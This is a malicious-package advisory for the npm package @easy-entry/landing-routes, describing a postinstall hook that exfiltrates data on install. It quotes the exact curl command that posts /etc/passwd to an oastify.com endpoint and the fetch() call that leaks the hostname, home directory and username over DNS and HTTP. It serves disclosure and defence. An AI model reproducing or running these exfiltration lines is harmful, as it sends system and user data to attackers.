@easy-entry/landing-routes@99.9.5
Vulnerability report · Last retrieved from osv.dev September 7, 2026 at 6:03 PM UTC
OSV ID
MAL-2026-5408
Ecosystem
npm
Summary
On npm install, the package's postinstall hook runs two exfiltration paths against an attacker-controlled Burp Collaborator endpoint. First, package.json line 4 invokes /usr/bin/curl --data '@/etc/passwd' $(hostname).200hj786m7x4kfz1lkr4kmshu80zoqcf.oastify.com, posting the installer's /etc/passwd to a DNS-logging subdomain that encodes the victim's hostname. Second, scripts/scream3gg.js reads os.hostname(), os.homedir(), and os.userInfo().username, hex-encodes them, and issues fetch('http://' + safeData + '.nmd25sur8sjp60lm75dp67e2gtmkaayz.oastify.com'), leaking host identifiers via DNS+HTTP. Both paths fire automatically on default install with no opt-in.
Source: amazon-inspector (16fd1aa3384490a5c01cbdc619bb61ea5fc70f853c8e8ed2e9836d2ca4617556)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.